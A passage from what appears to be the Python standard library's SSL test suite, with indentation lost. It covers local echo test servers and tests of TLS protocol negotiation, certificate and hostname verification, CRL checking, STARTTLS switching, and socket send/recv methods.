# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_context.load_verify_locations(SIGNING_CA)
server_context.load_cert_chain(SIGNED_CERTFILE2)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
